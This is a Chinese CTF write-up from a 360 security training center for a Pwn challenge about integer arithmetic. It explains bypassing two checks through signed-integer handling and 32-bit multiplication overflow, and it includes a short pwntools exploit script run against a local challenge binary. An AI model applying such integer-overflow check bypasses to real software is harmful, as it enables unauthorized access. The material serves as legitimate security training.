

赛题分析10：你会360内的加减乘除吗？

360安全人才能力发展中心

2019-10-29

导读：3CTF赛题分析题目类型：Pwn

赛题分析10：

你会360内的加减乘除吗？

题目类型：Pwn

解题思路：

绕过两个判断就能拿到flag

（1）判断1：x1和y1都是有符号整数，令y1为负就可以绕过判断

考察点：整数范围

（2）判断2：int类型大小为4个字节，通过eax传递，只要两个数相乘等于0x100000168，超过其表示范围就可以绕过

Exp:

from pwn import *

#context.log_level = 'debug'

p = process("./pwn1")

#p = remote("localhost",12345)

if __name__=='__main__':

p.recvuntil("x:")

p.sendline(str(359))

p.recvuntil("y:")

p.sendline(str(2**32-1))

p.recvuntil("Please input x and y:")

#gdb.attach(p)

p.sendline(str(0x0000000100000008)+" "+str(0x0000000100000168/8))

p.interactive()

360网络安全大学

如果你想展示你的CTF能力，我们提供给你机会，平台近期开始向社会征集CTF题目，题目类型不限制，奖励丰厚，有想法的大佬可以联系

university@360.cn。

【声明】内容源于网络

360安全人才能力发展中心

360政企安全集团旗下面向教育服务领域的唯一官方机构，致力于通过对人才能力的研究、教育平台的打造、教学内容的开发、教育服务生态的建设，为各机构和组织提供网络安全组织能力咨询、人才能力培养、专业能力认证、人才能力评估等服务。

内容 395

粉丝 0

360安全人才能力发展中心 360政企安全集团旗下面向教育服务领域的唯一官方机构，致力于通过对人才能力的研究、教育平台的打造、教学内容的开发、教育服务生态的建设，为各机构和组织提供网络安全组织能力咨询、人才能力培养、专业能力认证、人才能力评估等服务。

总阅读779

粉丝0

内容395